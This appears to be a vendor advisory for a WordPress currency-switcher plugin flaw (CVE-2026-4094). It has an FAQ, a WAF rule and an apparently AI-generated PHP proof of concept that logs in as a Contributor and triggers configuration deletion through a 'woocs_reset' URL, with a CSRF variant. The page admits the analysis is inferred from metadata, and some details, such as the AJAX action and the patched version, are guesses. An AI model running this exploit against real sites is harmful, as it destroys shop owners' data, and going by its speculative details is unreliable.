What is CVE-2026-4094?

CVE-2026-4094 is a high-severity vulnerability in the FOX – Currency Switcher Professional for WooCommerce plugin for WordPress. It allows authenticated users with Contributor-level access or higher to delete the entire multi-currency configuration due to a missing authorization check.

How does the vulnerability work?

The vulnerability exists in the ‘admin_head’ function, which lacks a capability check before processing the ‘woocs_reset’ parameter. This allows attackers to delete configurations by simply appending the parameter to any wp-admin URL.

Who is affected by this vulnerability?

Authenticated users with Contributor-level access or higher are affected by this vulnerability. Additionally, if Subscriber-level users have access to wp-admin pages, they may also exploit this flaw.

How can I check if my site is vulnerable?

Check the version of the FOX – Currency Switcher Professional for WooCommerce plugin on your WordPress site. If you are using version 1.4.5 or earlier, your site is vulnerable to CVE-2026-4094.

What is the CVSS score and what does it mean?

The CVSS score for this vulnerability is 8.1, indicating a high severity level. This score reflects the significant impact on the availability and integrity of the multi-currency configuration, which can lead to data loss.

How can I fix this vulnerability?

To mitigate this vulnerability, update the FOX – Currency Switcher Professional for WooCommerce plugin to version 1.4.6 or later. This version is expected to include the necessary capability checks and nonce verification.

What is a nonce and why is it important?

A nonce is a security token used to verify that a request comes from a legitimate source. In this case, the lack of nonce verification allows attackers to exploit the vulnerability via Cross-Site Request Forgery (CSRF) attacks.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability can lead to complete deletion of the multi-currency configuration, resulting in data loss and disruption of e-commerce functionality. This can affect pricing, currency conversion rates, and display options.

How does the proof of concept demonstrate the issue?

The proof of concept provided shows how an authenticated user can exploit the vulnerability by sending a request to the wp-admin page with the ‘woocs_reset’ parameter. This illustrates the ease of executing the attack without proper authorization checks.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider restricting access to wp-admin pages for lower-level users and monitoring user roles closely. Additionally, review your site’s security settings to minimize potential exploitation.

Where can I find more information about this vulnerability?

More information about CVE-2026-4094 can be found on security advisory sites such as the National Vulnerability Database (NVD) or through the plugin’s official documentation and update logs.

How can I stay informed about future vulnerabilities?

Regularly monitor security advisories, subscribe to vulnerability databases, and follow best practices for WordPress security, including keeping all plugins and themes updated and using security plugins.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 14, 2026

CVE-2026-4094: FOX – Currency Switcher Professional for WooCommerce <= 1.4.5 – Missing Authorization to Authenticated (Contributor+) Configuration Deletion (woocommerce-currency-switcher)

CVE ID CVE-2026-4094

Plugin woocommerce-currency-switcher

Severity High (CVSS 8.1)

CWE 862

Vulnerable Version 1.4.5

Patched Version —

Disclosed May 13, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4094 (metadata-based): This vulnerability in the FOX – Currency Switcher Professional for WooCommerce plugin allows authenticated attackers with Contributor-level access or higher to delete the entire multi-currency configuration. The flaw exists in all versions up to and including 1.4.5. The CVSS score of 8.1 (High) reflects the significant impact on availability and integrity.

The root cause is a Missing Authorization check (CWE-862) in the ‘admin_head’ function. This function likely hooks into WordPress admin page loads and checks for a ‘woocs_reset’ parameter in the URL. Atomic Edge analysis infers that the plugin fails to call current_user_can() or similar capability checks before processing the reset action. The description confirms no nonce verification exists, making it additionally vulnerable to Cross-Site Request Forgery (CSRF). Since no source code is available, these conclusions are based entirely on the CWE classification and vulnerability description.

An attacker with Contributor-level access can exploit this by visiting any WordPress admin page with the ‘woocs_reset’ parameter appended. The specific endpoint is any wp-admin page such as /wp-admin/index.php?woocs_reset=1. The attacker needs to be logged in with Contributor or higher privileges. The lack of a nonce check means an attacker can also craft a CSRF attack against an administrator by tricking them into clicking a malicious link or visiting a crafted page that triggers the reset.

The remediation likely requires adding a capability check (e.g., ‘manage_options’ or a custom capability) to the admin_head function before processing the woocs_reset parameter. Additionally, a nonce check must be implemented to prevent CSRF attacks. Atomic Edge analysis recommends verifying that the patched version 1.4.6 enforces these security controls. Plugin administrators should update to version 1.4.6 immediately.

Successful exploitation causes complete deletion of the multi-currency configuration, resulting in data loss and service disruption for e-commerce functionality. The plugin manages currency settings that affect product pricing, currency conversion rates, and display options. Deleting this configuration requires manual reconfiguration, potentially causing incorrect pricing display until restored. This impacts both integrity and availability of the WooCommerce store.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-4094 (metadata-based)
# Block exploitation by matching the woocs_reset parameter on wp-admin pages
# This covers both direct authenticated attacks and CSRF scenarios
SecRule REQUEST_URI "@rx ^/wp-admin/" 
  "id:20264094,phase:2,deny,status:403,chain,msg:'CVE-2026-4094 FOX Currency Switcher configuration deletion via woocs_reset parameter',severity:'CRITICAL',tag:'CVE-2026-4094'"
  SecRule ARGS_GET:woocs_reset "@rx ^.{1,}$" "t:none,chain"
    SecRule REQUEST_METHOD "@streq GET" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4094 - FOX - Currency Switcher Professional for WooCommerce - Missing Authorization to Configuration Deletion

// Configuration
$target_url = 'https://example.com'; // Change this to the target WordPress site
$username = 'contributor'; // WordPress user with Contributor role or higher
$password = 'password'; // Password for the user

// Initialize cURL
$ch = curl_init();

// Step 1: Authenticate
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

$login_response = curl_exec($ch);

// Check if login was successful (basic check)
if (strpos($login_response, 'Dashboard') === false && strpos($login_response, 'wp-admin') === false) {
    die('Login failed. Check credentials or target URL.');
}

echo "Authentication successful.n";

// Step 2: Trigger the vulnerability by visiting any wp-admin page with woocs_reset parameter
// The vulnerability deletes multi-currency configuration when an admin page is loaded with this parameter
$exploit_url = $target_url . '/wp-admin/index.php?woocs_reset=1';

curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_POST, false); // GET request
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$exploit_response = curl_exec($ch);

if (curl_error($ch)) {
    die('cURL error: ' . curl_error($ch));
}

// Check response HTTP status
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo "HTTP Response Code: " . $http_code . "n";

// Check for success indicators (since no direct output, we rely on the configuration being deleted)
// In a real test, verify by checking if currency switcher settings are empty
if ($http_code == 200 || $http_code == 302) {
    echo "Exploit request sent successfully.n";
    echo "Note: The vulnerability triggers silently. Verify by checking if the multi-currency configuration has been deleted.n";
    echo "CSRF variant: An attacker could embed this URL (" . $exploit_url . ") in an img tag or iframe to trick an admin into triggering the reset without visiting the crafted page.n";
} else {
    echo "Exploit request may have failed. Check if the target is vulnerable.n";
}

// Cleanup
curl_close($ch);

// ===== ALTERNATIVE: Direct reset via admin-ajax.php (if applicable) =====
// If the plugin also exposes an AJAX endpoint, the following could be used
// $ajax_url = $target_url . '/wp-admin/admin-ajax.php';
// $ajax_data = array(
//     'action' => 'woocs_reset_config', // Inferred action name
//     'nonce' => '' // No nonce required per vulnerability
// );
// curl_setopt($ch, CURLOPT_URL, $ajax_url);
// curl_setopt($ch, CURLOPT_POST, true);
// curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($ajax_data));
// $ajax_response = curl_exec($ch);

?>

Frequently Asked Questions

What is CVE-2026-4094?
Overview of the vulnerability
CVE-2026-4094 is a high-severity vulnerability in the FOX – Currency Switcher Professional for WooCommerce plugin for WordPress. It allows authenticated users with Contributor-level access or higher to delete the entire multi-currency configuration due to a missing authorization check.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability exists in the ‘admin_head’ function, which lacks a capability check before processing the ‘woocs_reset’ parameter. This allows attackers to delete configurations by simply appending the parameter to any wp-admin URL.
Who is affected by this vulnerability?
User roles and access levels
Authenticated users with Contributor-level access or higher are affected by this vulnerability. Additionally, if Subscriber-level users have access to wp-admin pages, they may also exploit this flaw.
How can I check if my site is vulnerable?
Identifying vulnerable versions
Check the version of the FOX – Currency Switcher Professional for WooCommerce plugin on your WordPress site. If you are using version 1.4.5 or earlier, your site is vulnerable to CVE-2026-4094.
What is the CVSS score and what does it mean?
Understanding risk assessment
The CVSS score for this vulnerability is 8.1, indicating a high severity level. This score reflects the significant impact on the availability and integrity of the multi-currency configuration, which can lead to data loss.
How can I fix this vulnerability?
Recommended remediation steps
To mitigate this vulnerability, update the FOX – Currency Switcher Professional for WooCommerce plugin to version 1.4.6 or later. This version is expected to include the necessary capability checks and nonce verification.
What is a nonce and why is it important?
Role of nonces in security
A nonce is a security token used to verify that a request comes from a legitimate source. In this case, the lack of nonce verification allows attackers to exploit the vulnerability via Cross-Site Request Forgery (CSRF) attacks.
What are the practical risks of this vulnerability?
Consequences of exploitation
Exploitation of this vulnerability can lead to complete deletion of the multi-currency configuration, resulting in data loss and disruption of e-commerce functionality. This can affect pricing, currency conversion rates, and display options.
How does the proof of concept demonstrate the issue?
Understanding the exploit
The proof of concept provided shows how an authenticated user can exploit the vulnerability by sending a request to the wp-admin page with the ‘woocs_reset’ parameter. This illustrates the ease of executing the attack without proper authorization checks.
What should I do if I cannot update the plugin immediately?
Interim mitigation strategies
If immediate updates are not possible, consider restricting access to wp-admin pages for lower-level users and monitoring user roles closely. Additionally, review your site’s security settings to minimize potential exploitation.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-4094 can be found on security advisory sites such as the National Vulnerability Database (NVD) or through the plugin’s official documentation and update logs.
How can I stay informed about future vulnerabilities?
Best practices for security awareness
Regularly monitor security advisories, subscribe to vulnerability databases, and follow best practices for WordPress security, including keeping all plugins and themes updated and using security plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations